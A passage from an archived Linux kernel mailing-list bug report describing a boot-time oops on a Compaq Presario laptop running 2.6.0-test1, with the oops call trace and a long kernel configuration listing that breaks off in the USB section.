    <t>Distribution: RedHat 8.0 Hardware Environment: Presario laptop model 12XL325, P III-650 Software Environment: Problem Description: laptop panics on boot with following oops info available: It gives me Unable to handle kernel paging request at virtual address c035800 *pde = 00102027 *pte = 00358000 Oops: 0000[#1] CPU: 0 EIP: 0060:[&lt;C014CE95&gt;] Not tainted EFLAGS: 00010002 EIP is at store_stackinfo+0x85/0xc0 The call trace is: kmem_cache_free+0x24f/0x350 mempool_free+0xc5/0x1e0 mempool_free+0xc5/0x1e0 _blk_put_request+0x77/0xb0 end_that_request_last_0x56/0xa0 ide_end_request+0x1a3/0x260 _ide_dma_end+0x71/0xa0 ide_dma_intr+0x93/0xc0 ide_intr+0x279/0x550 timer_interrupt+0x89/0x240 ide_dma_intr+0x0/0xc0 handle_IRQ_event+0x3b/0x70 do_IRQ+0x117/0x350 Steps to reproduce: Compile a kernel with attached configuration on a Presario 12XL325 and boot. CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_EMBEDDED is not set MARC: msg 'Presario oops on 2.6.0-test1' (p3 of 26) CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 MARC: msg 'Presario oops on 2.6.0-test1' (p4 of 26) CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set # CONFIG_PREEMPT is not set # CONFIG_X86_UP_APIC is not set CONFIG_X86_TSC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=m CONFIG_X86_CPUID=m # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # # CONFIG_ACPI is not set CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set CONFIG_APM_CPU_IDLE=y # CONFIG_APM_DISPLAY_BLANK is not set # CONFIG_APM_RTC_IS_GMT is not set # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling MARC: msg 'Presario oops on 2.6.0-test1' (p5 of 26) # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # CONFIG_PCMCIA=m CONFIG_YENTA=m CONFIG_CARDBUS=y # CONFIG_I82092 is not set # CONFIG_I82365 is not set # CONFIG_TCIC is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_ELF=y CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_MISC=m # # Generic Driver Options # MARC: msg 'Presario oops on 2.6.0-test1' (p6 of 26) # CONFIG_FW_LOADER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_OTHER is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # # CONFIG_PNP is not set # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_BLK_DEV_INITRD is not set # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y MARC: msg 'Presario oops on 2.6.0-test1' (p7 of 26) # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set # CONFIG_BLK_DEV_IDECS is not set CONFIG_BLK_DEV_IDECD=m # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set MARC: msg 'Presario oops on 2.6.0-test1' (p8 of 26) # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y # CONFIG_IDE_CHIPSETS is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # # CONFIG_SCSI is not set # # Old CD-ROM drivers (not SCSI, not IDE) # # CONFIG_CD_NO_IDESCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y MARC: msg 'Presario oops on 2.6.0-test1' (p9 of 26) # # Networking options # CONFIG_PACKET=m CONFIG_PACKET_MMAP=y CONFIG_NETLINK_DEV=m CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_UNIX=m CONFIG_NET_KEY=m CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set CONFIG_SYN_COOKIES=y # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set CONFIG_INET_IPCOMP=y # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_TFTP=m # CONFIG_IP_NF_AMANDA is not set CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m MARC: msg 'Presario oops on 2.6.0-test1' (p10 of 26) CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_UNCLEAN=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_MIRROR=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m # CONFIG_IP_NF_NAT_LOCAL is not set CONFIG_IP_NF_NAT_SNMP_BASIC=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set MARC: msg 'Presario oops on 2.6.0-test1' (p11 of 26) # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # CONFIG_NET_TULIP=y CONFIG_DE2104X=m CONFIG_TULIP=m # CONFIG_TULIP_MWI is not set # CONFIG_TULIP_MMIO is not set CONFIG_DE4X5=m MARC: msg 'Presario oops on 2.6.0-test1' (p12 of 26) CONFIG_WINBOND_840=m CONFIG_DM9102=m CONFIG_PCMCIA_XIRCOM=m CONFIG_PCMCIA_XIRTULIP=m # CONFIG_AT1700 is not set # CONFIG_DEPCA is not set # CONFIG_HP100 is not set # CONFIG_NET_ISA is not set # CONFIG_NET_PCI is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # MARC: msg 'Presario oops on 2.6.0-test1' (p13 of 26) # CONFIG_WAN is not set # # PCMCIA network device support # CONFIG_NET_PCMCIA=y # CONFIG_PCMCIA_3C589 is not set # CONFIG_PCMCIA_3C574 is not set # CONFIG_PCMCIA_FMVJ18X is not set # CONFIG_PCMCIA_PCNET is not set # CONFIG_PCMCIA_NMCLAN is not set # CONFIG_PCMCIA_SMC91C92 is not set # CONFIG_PCMCIA_XIRC2PS is not set # CONFIG_PCMCIA_AXNET is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set MARC: msg 'Presario oops on 2.6.0-test1' (p14 of 26) # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_INPORT is not set # CONFIG_MOUSE_LOGIBM is not set # CONFIG_MOUSE_PC110PAD is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y CONFIG_INPUT_PCSPKR=y # CONFIG_INPUT_UINPUT is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y MARC: msg 'Presario oops on 2.6.0-test1' (p15 of 26) CONFIG_SERIAL_8250_CONSOLE=y # CONFIG_SERIAL_8250_CS is not set # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=512 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_ALGOBIT=m CONFIG_I2C_PROSAVAGE=m CONFIG_I2C_PHILIPSPAR=m CONFIG_I2C_ELV=m CONFIG_I2C_VELLEMAN=m # CONFIG_SCx200_ACB is not set CONFIG_I2C_ALGOPCF=m CONFIG_I2C_ELEKTOR=m CONFIG_I2C_CHARDEV=m # # I2C Hardware Sensors Mainboard support # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI15X3 is not set CONFIG_I2C_AMD756=m CONFIG_I2C_AMD8111=m # CONFIG_I2C_I801 is not set CONFIG_I2C_ISA=m # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_VIAPRO is not set # # I2C Hardware Sensors Chip support # CONFIG_SENSORS_ADM1021=m # CONFIG_SENSORS_IT87 is not set MARC: msg 'Presario oops on 2.6.0-test1' (p16 of 26) CONFIG_SENSORS_LM75=m # CONFIG_SENSORS_LM85 is not set CONFIG_SENSORS_LM78=m # CONFIG_SENSORS_VIA686A is not set CONFIG_SENSORS_W83781D=m CONFIG_I2C_SENSOR=m # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set CONFIG_HW_RANDOM=y # CONFIG_NVRAM is not set CONFIG_RTC=m # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=m # CONFIG_AGP_ALI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD_8151 is not set # CONFIG_AGP_INTEL is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set CONFIG_AGP_VIA=m # CONFIG_DRM is not set # # PCMCIA character devices MARC: msg 'Presario oops on 2.6.0-test1' (p17 of 26) # # CONFIG_SYNCLINK_CS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y # CONFIG_EXT2_FS_POSIX_ACL is not set # CONFIG_EXT2_FS_SECURITY is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set CONFIG_MINIX_FS=m # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y # CONFIG_UDF_FS is not set MARC: msg 'Presario oops on 2.6.0-test1' (p18 of 26) # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=m CONFIG_MSDOS_FS=m CONFIG_VFAT_FS=m # CONFIG_NTFS_FS is not set # # Pseudo filesystems # CONFIG_PROC_FS=y # CONFIG_DEVFS_FS is not set CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y CONFIG_RAMFS=y # # Miscellaneous filesystems # # CONFIG_ADFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_HFS_FS is not set # CONFIG_BEFS_FS is not set # CONFIG_BFS_FS is not set # CONFIG_EFS_FS is not set # CONFIG_CRAMFS is not set # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=m CONFIG_NFS_V3=y # CONFIG_NFS_V4 is not set CONFIG_NFSD=m CONFIG_NFSD_V3=y # CONFIG_NFSD_V4 is not set # CONFIG_NFSD_TCP is not set CONFIG_LOCKD=m CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=m MARC: msg 'Presario oops on 2.6.0-test1' (p19 of 26) CONFIG_SUNRPC=m # CONFIG_SUNRPC_GSS is not set CONFIG_SMB_FS=m # CONFIG_SMB_NLS_DEFAULT is not set CONFIG_CIFS=m # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # CONFIG_PARTITION_ADVANCED=y # CONFIG_ACORN_PARTITION is not set # CONFIG_OSF_PARTITION is not set # CONFIG_AMIGA_PARTITION is not set # CONFIG_ATARI_PARTITION is not set # CONFIG_MAC_PARTITION is not set CONFIG_MSDOS_PARTITION=y # CONFIG_BSD_DISKLABEL is not set # CONFIG_MINIX_SUBPARTITION is not set # CONFIG_SOLARIS_X86_PARTITION is not set # CONFIG_UNIXWARE_DISKLABEL is not set # CONFIG_LDM_PARTITION is not set # CONFIG_NEC98_PARTITION is not set # CONFIG_SGI_PARTITION is not set # CONFIG_ULTRIX_PARTITION is not set # CONFIG_SUN_PARTITION is not set # CONFIG_EFI_PARTITION is not set CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=m # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set # CONFIG_NLS_CODEPAGE_850 is not set # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set MARC: msg 'Presario oops on 2.6.0-test1' (p20 of 26) # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=m # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set # CONFIG_NLS_ISO8859_15 is not set # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=m # # Graphics support # CONFIG_FB=y # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set MARC: msg 'Presario oops on 2.6.0-test1' (p21 of 26) # CONFIG_FB_TRIDENT is not set # CONFIG_FB_PM3 is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y CONFIG_PCI_CONSOLE=y # CONFIG_FONTS is not set CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y # # Logo configuration # CONFIG_LOGO=y # CONFIG_LOGO_LINUX_MONO is not set # CONFIG_LOGO_LINUX_VGA16 is not set CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=m # # Advanced Linux Sound Architecture # CONFIG_SND=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_RTCTIMER is not set CONFIG_SND_VERBOSE_PRINTK=y CONFIG_SND_DEBUG=y CONFIG_SND_DEBUG_MEMORY=y CONFIG_SND_DEBUG_DETECT=y # # Generic devices # MARC: msg 'Presario oops on 2.6.0-test1' (p22 of 26) CONFIG_SND_DUMMY=m CONFIG_SND_VIRMIDI=m # CONFIG_SND_MTPAV is not set CONFIG_SND_SERIAL_U16550=m CONFIG_SND_MPU401=m # # ISA devices # # CONFIG_SND_AD1848 is not set # CONFIG_SND_CS4231 is not set # CONFIG_SND_CS4232 is not set # CONFIG_SND_CS4236 is not set # CONFIG_SND_ES1688 is not set # CONFIG_SND_ES18XX is not set # CONFIG_SND_GUSCLASSIC is not set # CONFIG_SND_GUSEXTREME is not set # CONFIG_SND_GUSMAX is not set # CONFIG_SND_INTERWAVE is not set # CONFIG_SND_INTERWAVE_STB is not set # CONFIG_SND_OPTI92X_AD1848 is not set # CONFIG_SND_OPTI92X_CS4231 is not set # CONFIG_SND_OPTI93X is not set # CONFIG_SND_SB8 is not set # CONFIG_SND_SB16 is not set # CONFIG_SND_SBAWE is not set # CONFIG_SND_WAVEFRONT is not set # CONFIG_SND_CMI8330 is not set # CONFIG_SND_OPL3SA2 is not set # CONFIG_SND_SGALAXY is not set # CONFIG_SND_SSCAPE is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set CONFIG_SND_YMFPCI=m MARC: msg 'Presario oops on 2.6.0-test1' (p23 of 26) # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_SONICVIBES is not set CONFIG_SND_VIA82XX=m # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # PCMCIA devices # # CONFIG_SND_VXPOCKET is not set # CONFIG_SND_VXP440 is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # 